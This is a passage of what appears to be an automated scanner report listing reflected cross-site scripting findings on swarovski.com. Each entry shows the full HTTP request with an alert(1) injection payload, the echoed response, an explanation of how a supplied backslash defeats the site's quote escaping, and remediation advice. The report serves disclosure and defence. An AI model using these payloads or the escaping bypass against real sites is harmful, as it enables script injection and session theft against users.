<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... .enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Footer-ViewContact', query: '3a817\\';alert(1)//30fbdaee691=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.21. http://www.swarovski.com/Web_US/en/copyright [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.swarovski.com
Path: /Web_US/en/copyright
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49098\'%3balert(1)//1a9843764de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 49098\\';alert(1)//1a9843764de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation marks are; in the other order, the backslash the application adds in front of each quotation mark is itself doubled, and the string can again be terminated. The same treatment should also cover the closing </script> sequence and line terminators, or, more simply, every non-alphanumeric character can be emitted as a JavaScript \xHH or \uHHHH escape.
Request
GET /Web_US/en/copyright?49098\'%3balert(1)//1a9843764de=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... nfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Footer-ViewCopyright', query: '49098\\';alert(1)//1a9843764de=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.22. http://www.swarovski.com/Web_US/en/crystal_society [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/crystal_society
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 327d3\'%3balert(1)//470df5ae6b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 327d3\\';alert(1)//470df5ae6b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation marks are; in the other order, the backslash the application adds in front of each quotation mark is itself doubled, and the string can again be terminated. The same treatment should also cover the closing </script> sequence and line terminators, or, more simply, every non-alphanumeric character can be emitted as a JavaScript \xHH or \uHHHH escape.
Request
GET /Web_US/en/crystal_society?327d3\'%3balert(1)//470df5ae6b9=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... nity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_CrystalSociety-ViewPage', query: '327d3\\';alert(1)//470df5ae6b9=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.23. http://www.swarovski.com/Web_US/en/customer_service [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/customer_service
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8768f\'%3balert(1)//e0bfce5c152 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8768f\\';alert(1)//e0bfce5c152 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation marks are; in the other order, the backslash the application adds in front of each quotation mark is itself doubled, and the string can again be terminated. The same treatment should also cover the closing </script> sequence and line terminators, or, more simply, every non-alphanumeric character can be emitted as a JavaScript \xHH or \uHHHH escape.
Request
GET /Web_US/en/customer_service?8768f\'%3balert(1)//e0bfce5c152=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... ity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_CustomerService-ViewPage', query: '8768f\\';alert(1)//e0bfce5c152=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.24. http://www.swarovski.com/Web_US/en/dataprotection [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/dataprotection
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d0c8\'%3balert(1)//9f86821e0e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1d0c8\\';alert(1)//9f86821e0e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation marks are; in the other order, the backslash the application adds in front of each quotation mark is itself doubled, and the string can again be terminated. The same treatment should also cover the closing </script> sequence and line terminators, or, more simply, every non-alphanumeric character can be emitted as a JavaScript \xHH or \uHHHH escape.
Request
GET /Web_US/en/dataprotection?1d0c8\'%3balert(1)//9f86821e0e3=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... ty/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Footer-ViewDataProtection', query: '1d0c8\\';alert(1)//9f86821e0e3=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.25. http://www.swarovski.com/Web_US/en/embedded_microsite [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/embedded_microsite
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f7ed\'%3balert(1)//215332f6ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f7ed\\';alert(1)//215332f6ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation marks are; in the other order, the backslash the application adds in front of each quotation mark is itself doubled, and the string can again be terminated. The same treatment should also cover the closing </script> sequence and line terminators, or, more simply, every non-alphanumeric character can be emitted as a JavaScript \xHH or \uHHHH escape.
Request
GET /Web_US/en/embedded_microsite?8f7ed\'%3balert(1)//215332f6ab=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_EmbeddedMicrosite-ViewFlashTheme', query: '8f7ed\\';alert(1)//215332f6ab=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.26. http://www.swarovski.com/Web_US/en/giftcentre [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/giftcentre
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5998\'%3balert(1)//ecac31f4e8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5998\\';alert(1)//ecac31f4e8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation marks are; in the other order, the backslash the application adds in front of each quotation mark is itself doubled, and the string can again be terminated. The same treatment should also cover the closing </script> sequence and line terminators, or, more simply, every non-alphanumeric character can be emitted as a JavaScript \xHH or \uHHHH escape.
Request
GET /Web_US/en/giftcentre?e5998\'%3balert(1)//ecac31f4e8c=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_GiftCentre-ViewPage', query: 'e5998\\';alert(1)//ecac31f4e8c=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.27. http://www.swarovski.com/Web_US/en/imprint [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/imprint
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f64c\'%3balert(1)//6a4e240ceec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f64c\\';alert(1)//6a4e240ceec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation marks are; in the other order, the backslash the application adds in front of each quotation mark is itself doubled, and the string can again be terminated. The same treatment should also cover the closing </script> sequence and line terminators, or, more simply, every non-alphanumeric character can be emitted as a JavaScript \xHH or \uHHHH escape.
Request
GET /Web_US/en/imprint?9f64c\'%3balert(1)//6a4e240ceec=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... .enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Footer-ViewImprint', query: '9f64c\\';alert(1)//6a4e240ceec=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.28. http://www.swarovski.com/Web_US/en/index [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/index
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9c40\'%3balert(1)//2a75e960d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9c40\\';alert(1)//2a75e960d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation marks are; in the other order, the backslash the application adds in front of each quotation mark is itself doubled, and the string can again be terminated. The same treatment should also cover the closing </script> sequence and line terminators, or, more simply, every non-alphanumeric character can be emitted as a JavaScript \xHH or \uHHHH escape.
Request
GET /Web_US/en/index?d9c40\'%3balert(1)//2a75e960d9=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... nfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_LandingPage-ViewPage', query: 'd9c40\\';alert(1)//2a75e960d9=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.29. http://www.swarovski.com/Web_US/en/magazine [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/magazine
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b07c\'%3balert(1)//2344600ba4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b07c\\';alert(1)//2344600ba4e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation marks are; in the other order, the backslash the application adds in front of each quotation mark is itself doubled, and the string can again be terminated. The same treatment should also cover the closing </script> sequence and line terminators, or, more simply, every non-alphanumeric character can be emitted as a JavaScript \xHH or \uHHHH escape.
Request
GET /Web_US/en/magazine?1b07c\'%3balert(1)//2344600ba4e=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... P.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Magazine-ViewPage', query: '1b07c\\';alert(1)//2344600ba4e=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.30. http://www.swarovski.com/Web_US/en/online_shop [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/online_shop
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97361\'%3balert(1)//bdf29445caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97361\\';alert(1)//bdf29445caa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
